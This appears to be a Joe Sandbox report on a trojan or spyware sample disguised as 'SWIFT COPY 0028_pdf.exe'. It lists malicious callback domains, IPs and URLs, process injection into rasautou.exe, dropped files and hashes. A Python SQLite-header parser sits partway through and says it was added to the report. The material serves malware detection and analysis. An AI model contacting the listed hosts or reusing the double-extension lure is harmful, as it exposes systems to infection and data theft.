https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404 | 0% | Avira URL Cloud | safe |
http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif | 0% | Avira URL Cloud | safe |
http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov5hXyxvkYczVsVuddv1TKr98fV67HMUUNiXk30NJOQiWMtrF+8k=&9xn=fHadNpk8MVax | 0% | Avira URL Cloud | safe |
https://www.grandesofertas.fun/5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW | 0% | Avira URL Cloud | safe |
http://www.beythome.online/80gy/ | 0% | Avira URL Cloud | safe |
https://static.minne.com/files/banner/minne_600x500 | 0% | Avira URL Cloud | safe |
http://www.aziziyeescortg.xyz/wbcb/?9xn=fHadNpk8MVax&GR54yHZ8=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K07oOsp/5ysfwWmAOXTj0WnbyU/nOpjct5usIHCkjfDMsHKGZFI= | 0% | Avira URL Cloud | safe |
http://www.nuy25c9t.sbs/lmj1/ | 0% | Avira URL Cloud | safe |
http://www.nonpressure.beauty/ymqd/?GR54yHZ8=mPy66x3IfJKracCH7wZR1aUAlhDvAV8zvELzb8KITnbno7Ubu3OHpx/EILO3OYxVnkt90JirtFkeXZQsCCcXJBbLSRzz4hD+Fif5IhUF/AIFPB6kYSO8O2aHFbYKqoGjWs62c28=&9xn=fHadNpk8MVax | 100% | Avira URL Cloud | malware |
http://www.tempatmudisini06.click/0kli/?GR54yHZ8=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/AI0vJO7v6wOh3ABnBMRs5EHLHNUVXEXSqZ/A5JpvJLk63zT1cr4=&9xn=fHadNpk8MVax | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.aziziyeescortg.xyz | 188.114.96.3 | true | true | | unknown
www.optimismbank.xyz | 13.248.169.48 | true | true | | unknown
www.madhf.tech | 103.224.182.242 | true | true | | unknown
tempatmudisini06.click | 103.21.221.4 | true | true | | unknown
www.housew.website | 203.161.46.205 | true | true | | unknown
b1-3-r111.kunlundns.top | 43.155.76.124 | true | true | | unknown
natroredirect.natrocdn.com | 85.159.66.93 | true | false | | high
www.a1shop.shop | 13.248.169.48 | true | true | | unknown
callyur.shop | 66.29.137.10 | true | true | | unknown
www.aiactor.xyz | 13.248.169.48 | true | true | | unknown
ssl.goentri.com | 76.223.74.74 | true | true | | unknown
www.questmatch.pro | 188.114.96.3 | true | true | | unknown
www.conansog.shop | 172.67.162.12 | true | true | | unknown
www.nonpressure.beauty | 104.21.4.93 | true | true | | unknown
www.sitioseguro.blog | 172.67.162.39 | true | true | | unknown
www.sankan-fukushi.info | 163.44.185.183 | true | true | | unknown
www.grandesofertas.fun | unknown | unknown | false | | unknown
www.callyur.shop | unknown | unknown | false | | unknown
www.beythome.online | unknown | unknown | false | | unknown
www.nuy25c9t.sbs | unknown | unknown | false | | unknown
www.tempatmudisini06.click | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.tempatmudisini06.click/0kli/ | true | Avira URL Cloud: safe | unknown
http://www.optimismbank.xyz/lnyv/ | true | Avira URL Cloud: safe | unknown
http://www.questmatch.pro/ipd6/ | true | Avira URL Cloud: safe | unknown
http://www.sitioseguro.blog/arvb/ | true | Avira URL Cloud: safe | unknown
http://www.sankan-fukushi.info/21k5/?9xn=fHadNpk8MVax&GR54yHZ8=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A7+iBUY3/A2GvnNR6vC/W+DoFDwg0HeJMbxHf0rMeHWrRIOFx4E= | true | Avira URL Cloud: safe | unknown
http://www.a1shop.shop/0krx/ | true | Avira URL Cloud: safe | unknown
http://www.aiactor.xyz/g2y0/?GR54yHZ8=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYGkLQdnxWLNNRJRrSDnZ+4vw6seRBsYWgxI51lS2SbfnTvxGN+Y=&9xn=fHadNpk8MVax | true | Avira URL Cloud: safe | unknown
http://www.nonpressure.beauty/ymqd/ | true | Avira URL Cloud: malware | unknown
http://www.housew.website/4pih/ | true | Avira URL Cloud: safe | unknown
http://www.sankan-fukushi.info/21k5/ | true | Avira URL Cloud: safe | unknown
http://www.grandesofertas.fun/5rfk/ | true | Avira URL Cloud: safe | unknown
http://www.callyur.shop/hayl/ | true | Avira URL Cloud: safe | unknown
http://www.grandesofertas.fun/5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwn0n+VmG53SX0EAb83CrCeMIkzMnSL4JpBihhagjpE3GksySBz8=&9xn=fHadNpk8MVax | true | Avira URL Cloud: safe | unknown
http://www.callyur.shop/hayl/?GR54yHZ8=7uA1bLkCaR9ampYb6jJSXGsXTCFtFEKjMbBrHkb2OaN+7KcXsqyJMoKLTM78+R5XhUdg+bLytXUVrFAv0hUdKTwX6reWgqWzJPe83oti/Pnp22FBmmdcqVWV2wV/tDaQIoOgzZo=&9xn=fHadNpk8MVax | true | Avira URL Cloud: safe | unknown
http://www.housew.website/4pih/?9xn=fHadNpk8MVax&GR54yHZ8=ZmPwAj1McUpIZiz0LuViOUq+B7yzDKheiuLx3j/o2iG3zDrxD498zlZSm94ILhpOzlwyZVIuLGPVSJZjqSUFLPfqxdekucT9Chqzy6Pm+Rnw0xtYs44Mkmek35mpNA+VZaQoqJ0= | true | Avira URL Cloud: safe | unknown
http://www.nuy25c9t.sbs/lmj1/?GR54yHZ8=JytxcoExloxtM9GYw/YkVBPtQn8SsYRrRxOyYElJ8zmzZDKm1RUtP4/aN3HHeJpfiiM3EsU/TmM7ebohnljNLiPIHS/Z5elBdrknxTUpZLsvI6YW4AGk52pDe9J+i7QDvUP60yU=&9xn=fHadNpk8MVax | true | Avira URL Cloud: safe | unknown
http://www.conansog.shop/m7wz/ | true | Avira URL Cloud: safe | unknown
http://www.sitioseguro.blog/arvb/?GR54yHZ8=ZBQQqxbud8SVIvMkbBf/fVH1me8478TvMeRY2MiH3kRRc/z7OAWaNoWdi819/s5bJQ0i5xulgwkm2DEXU68//topbf+A00Q8GVm5yCYkyRQ3ElhjsG3EX+N+jW0L22iONcil9J4=&9xn=fHadNpk8MVax | true | Avira URL Cloud: safe | unknown
http://www.aiactor.xyz/g2y0/ | true | Avira URL Cloud: safe | unknown
http://www.madhf.tech/vpqb/ | true | Avira URL Cloud: safe | unknown
http://www.a1shop.shop/0krx/?GR54yHZ8=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwNnfiM63cxzeqfNeG1D29tziIpAE2Hdr0kt8oEMtEF+W9rbw3UA=&9xn=fHadNpk8MVax | true | Avira URL Cloud: safe | unknown
http://www.questmatch.pro/ipd6/?9xn=fHadNpk8MVax&GR54yHZ8=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5uc/jX4WzK3nYbDP1BFL1MIpigvL/S+Ybe5ZZiUbOMV88bEfnEo= | true | Avira URL Cloud: safe | unknown
http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov5hXyxvkYczVsVuddv1TKr98fV67HMUUNiXk30NJOQiWMtrF+8k=&9xn=fHadNpk8MVax | true | Avira URL Cloud: safe | unknown
http://www.beythome.online/80gy/ | true | Avira URL Cloud: safe | unknown
http://www.aziziyeescortg.xyz/wbcb/?9xn=fHadNpk8MVax&GR54yHZ8=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K07oOsp/5ysfwWmAOXTj0WnbyU/nOpjct5usIHCkjfDMsHKGZFI= | true | Avira URL Cloud: safe | unknown
http://www.nuy25c9t.sbs/lmj1/ | true | Avira URL Cloud: safe | unknown
http://www.tempatmudisini06.click/0kli/?GR54yHZ8=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/AI0vJO7v6wOh3ABnBMRs5EHLHNUVXEXSqZ/A5JpvJLk63zT1cr4=&9xn=fHadNpk8MVax | true | Avira URL Cloud: safe | unknown
http://www.nonpressure.beauty/ymqd/?GR54yHZ8=mPy66x3IfJKracCH7wZR1aUAlhDvAV8zvELzb8KITnbno7Ubu3OHpx/EILO3OYxVnkt90JirtFkeXZQsCCcXJBbLSRzz4hD+Fif5IhUF/AIFPB6kYSO8O2aHFbYKqoGjWs62c28=&9xn=fHadNpk8MVax | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.nonpressure.beauty | nBMWUKLuWlMJko.exe, 00000006.00000002.4613324935.0000000002DD6000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lolipop.jp/ | rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://pepabo.com/ | rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer | rasautou.exe, 00000004.00000002.4614264307.00000000062E2000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000004102000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7P | nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.00000000045B8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | rasautou.exe, 00000004.00000002.4614264307.0000000006474000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000004294000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://support.lolipop.jp/hc/ja/articles/360049132953 | rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://kb.fastpanel.direct/troubleshoot/ | rasautou.exe, 00000004.00000002.4614264307.0000000006C4E000.00000004.10000000.00040000.00000000.sdmp, rasautou.exe, 00000004.00000002.4616494626.0000000007B20000.00000004.00000800.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000004A6E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404 | rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif | rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.grandesofertas.fun/5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW | rasautou.exe, 00000004.00000002.4614264307.0000000005976000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003796000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://js.ad-stir.com/js/adstir.js?20130527 | rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmp | false
                                                                                high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://static.minne.com/files/banner/minne_600x500rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  13.248.169.48
                                                                                  www.optimismbank.xyzUnited States
                                                                                  16509AMAZON-02UStrue
                                                                                  163.44.185.183
                                                                                  www.sankan-fukushi.infoJapan7506INTERQGMOInternetIncJPtrue
                                                                                  103.224.182.242
                                                                                  www.madhf.techAustralia
                                                                                  133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                  43.155.76.124
                                                                                  b1-3-r111.kunlundns.topJapan4249LILLY-ASUStrue
                                                                                  172.67.162.39
                                                                                  www.sitioseguro.blogUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  76.223.74.74
                                                                                  ssl.goentri.comUnited States
                                                                                  16509AMAZON-02UStrue
                                                                                  85.159.66.93
                                                                                  natroredirect.natrocdn.comTurkey
                                                                                  34619CIZGITRfalse
                                                                                  103.21.221.4
                                                                                  tempatmudisini06.clickunknown
                                                                                  9905LINKNET-ID-APLinknetASNIDtrue
                                                                                  172.67.162.12
                                                                                  www.conansog.shopUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  188.114.96.3
                                                                                  www.aziziyeescortg.xyzEuropean Union
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  104.21.4.93
                                                                                  www.nonpressure.beautyUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  203.161.46.205
                                                                                  www.housew.websiteMalaysia
                                                                                  45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                  66.29.137.10
                                                                                  callyur.shopUnited States
                                                                                  19538ADVANTAGECOMUStrue
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1559148
                                                                                  Start date and time:2024-11-20 08:30:25 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 50s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:12
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:2
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:SWIFT COPY 0028_pdf.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/3@17/13
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 75%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 97%
                                                                                  • Number of executed functions: 52
                                                                                  • Number of non-executed functions: 295
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target nBMWUKLuWlMJko.exe, PID 2940 because it is empty
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: SWIFT COPY 0028_pdf.exe
Time:02:32:11
Type:API Interceptor
Description:12181616x Sleep call for process: rasautou.exe modified
                                                                                  Process:C:\Windows\SysWOW64\rasautou.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
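The dropped file above is classified purely from its 100-byte SQLite header, and the report's own Preview line shows that header ("@" at offset 21, "Y" = 89 pages at offset 28, "7" = cookie 0x37 at offset 40). The parser below is an added example, not code from the report or from Joe Sandbox: it decodes the header fields at the offsets fixed by the SQLite file-format specification, rebuilds the File Type line from them, and adds the two checks a forensic reviewer wants before trusting the page count: the in-header size is only valid when version-valid-for equals the file change counter, and the page count times the page size should be compared with the real file size. The header bytes are constructed here from the values the report lists; they are not the dropped file itself.

```python
import struct

SQLITE_MAGIC = b"SQLite format 3\x00"
ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def parse_sqlite_header(blob: bytes) -> dict:
    """Decode the 100-byte SQLite 3 file header (big-endian fields at spec-defined offsets)."""
    if len(blob) < 100 or blob[:16] != SQLITE_MAGIC:
        raise ValueError("not a SQLite 3 database")

    def u32(off: int) -> int:
        return struct.unpack_from(">I", blob, off)[0]

    page_size = struct.unpack_from(">H", blob, 16)[0]
    return {
        "page_size": 65536 if page_size == 1 else page_size,  # the spec encodes 64 KiB as 1
        "file_change_counter": u32(24),
        "db_pages": u32(28),           # in-header size; trustworthy only if version_valid_for matches
        "schema_cookie": u32(40),
        "schema_format": u32(44),
        "text_encoding": ENCODINGS.get(u32(56), "unknown"),
        "version_valid_for": u32(92),
        "sqlite_version": u32(96),     # SQLITE_VERSION_NUMBER, e.g. 3042000 is 3.42.0
    }


def header_size_is_valid(h: dict) -> bool:
    """Per the spec, db_pages may be used only when version-valid-for equals the change counter."""
    return h["version_valid_for"] == h["file_change_counter"]


def expected_file_size(h: dict) -> int:
    """Size the header claims for the database, in bytes."""
    return h["db_pages"] * h["page_size"]


def describe(h: dict) -> str:
    """Render the header the way the report's File Type line does."""
    return (f"SQLite 3.x database, last written using SQLite version {h['sqlite_version']}, "
            f"page size {h['page_size']}, file counter {h['file_change_counter']}, "
            f"database pages {h['db_pages']}, cookie 0x{h['schema_cookie']:x}, "
            f"schema {h['schema_format']}, {h['text_encoding']}, "
            f"version-valid-for {h['version_valid_for']}")


def build_sample_header() -> bytes:
    """Constructed header carrying the values the report shows for the dropped file (not the file)."""
    h = bytearray(100)
    h[0:16] = SQLITE_MAGIC
    struct.pack_into(">H", h, 16, 2048)          # page size
    h[18] = h[19] = 1                             # write/read format version (rollback journal)
    h[21], h[22], h[23] = 64, 32, 32              # payload fractions, fixed by the spec ("@  " in the preview)
    struct.pack_into(">I", h, 24, 8)              # file change counter
    struct.pack_into(">I", h, 28, 89)             # in-header database size in pages ("Y")
    struct.pack_into(">I", h, 40, 0x37)           # schema cookie ("7")
    struct.pack_into(">I", h, 44, 4)              # schema format number
    struct.pack_into(">I", h, 56, 1)              # text encoding: UTF-8
    struct.pack_into(">I", h, 92, 8)              # version-valid-for
    struct.pack_into(">I", h, 96, 3042000)        # SQLite version that last wrote the file
    return bytes(h)


if __name__ == "__main__":
    hdr = parse_sqlite_header(build_sample_header())
    print(describe(hdr))
    print("page count valid:", header_size_is_valid(hdr),
          "| expected bytes:", expected_file_size(hdr), "| reported size: 196608")
```

Run against the report's values, the header is internally consistent (counter 8 == version-valid-for 8), but 89 pages of 2048 bytes is 182272 bytes while the dropped file is 196608 bytes (96 pages). The format allows the file to be longer than the in-header page count, so this is not corruption, but it is worth recording alongside the hashes when the file is carved out for offline inspection.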
                                                                                  Process:C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):290304
                                                                                  Entropy (8bit):7.9949146605094334
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:ZA7Db8gAPqzuZKz+2Ezm07IQoG5dBpDd0y8RhaD+g:xPqzQK/Ezm07Iy5dzDuyAhpg
                                                                                  MD5:5A5958BCA86E6545C97B0BF8A3846103
                                                                                  SHA1:20E4B02D639609C60F5C3E62C149FD46C51D2856
                                                                                  SHA-256:A14D0B58AE2CC9D7C8094A5FBE111D9B99299A591FCEBBBC4C63EDAA01B2080C
                                                                                  SHA-512:8FEB32EE7EA5E5C56C8E11BD4B03AAFF848A2FA3738F81B8FB617FCAD0659127802B04EFB8AC924540039543CAD9B4A8A73441BB66233D9B4A60E34E83050838
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:...9FQO8<6G2.OY.OTZ6YLYv4D0QH19EQO886G24WOYZOTZ6YLY64D0QH19.QO86).<4.F.{.U..x.1_Gd@#'VK$<o[YX)]@w-<z=!4.0"yr{..<'U\k\B2.6G24WOY#N]..9+..T#.l(V._....V ....f/3.,...T#..!RQx1(.86G24WOY..TZzXMY..ifQH19EQO8.6E3?VDYZ.PZ6YLY64D0.[19EAO88FC24W.YZ_TZ6[LY04D0QH19CQO886G24'KYZMTZ6YLY44..QH!9EAO886W24GOYZOTZ&YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G2.#*!.OTZ..HY6$D0Q.59EAO886G24WOYZOTZ.YL964D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ
                                                                                  Process:C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):290304
                                                                                  Entropy (8bit):7.9949146605094334
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:ZA7Db8gAPqzuZKz+2Ezm07IQoG5dBpDd0y8RhaD+g:xPqzQK/Ezm07Iy5dzDuyAhpg
                                                                                  MD5:5A5958BCA86E6545C97B0BF8A3846103
                                                                                  SHA1:20E4B02D639609C60F5C3E62C149FD46C51D2856
                                                                                  SHA-256:A14D0B58AE2CC9D7C8094A5FBE111D9B99299A591FCEBBBC4C63EDAA01B2080C
                                                                                  SHA-512:8FEB32EE7EA5E5C56C8E11BD4B03AAFF848A2FA3738F81B8FB617FCAD0659127802B04EFB8AC924540039543CAD9B4A8A73441BB66233D9B4A60E34E83050838
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:...9FQO8<6G2.OY.OTZ6YLYv4D0QH19EQO886G24WOYZOTZ6YLY64D0QH19.QO86).<4.F.{.U..x.1_Gd@#'VK$<o[YX)]@w-<z=!4.0"yr{..<'U\k\B2.6G24WOY#N]..9+..T#.l(V._....V ....f/3.,...T#..!RQx1(.86G24WOY..TZzXMY..ifQH19EQO8.6E3?VDYZ.PZ6YLY64D0.[19EAO88FC24W.YZ_TZ6[LY04D0QH19CQO886G24'KYZMTZ6YLY44..QH!9EAO886W24GOYZOTZ&YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G2.#*!.OTZ..HY6$D0Q.59EAO886G24WOYZOTZ.YL964D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ6YLY64D0QH19EQO886G24WOYZOTZ
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.150498811768912
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:SWIFT COPY 0028_pdf.exe
                                                                                  File size:1'217'536 bytes
                                                                                  MD5:aa99009ff8c996ccefd78eb8a4ce1d7e
                                                                                  SHA1:4061428787fa914d12ba52bc80af6c1725a2482d
                                                                                  SHA256:4c16a10a2942e6a9383fc241bf4232a087333c383c5a269381300e9036c01178
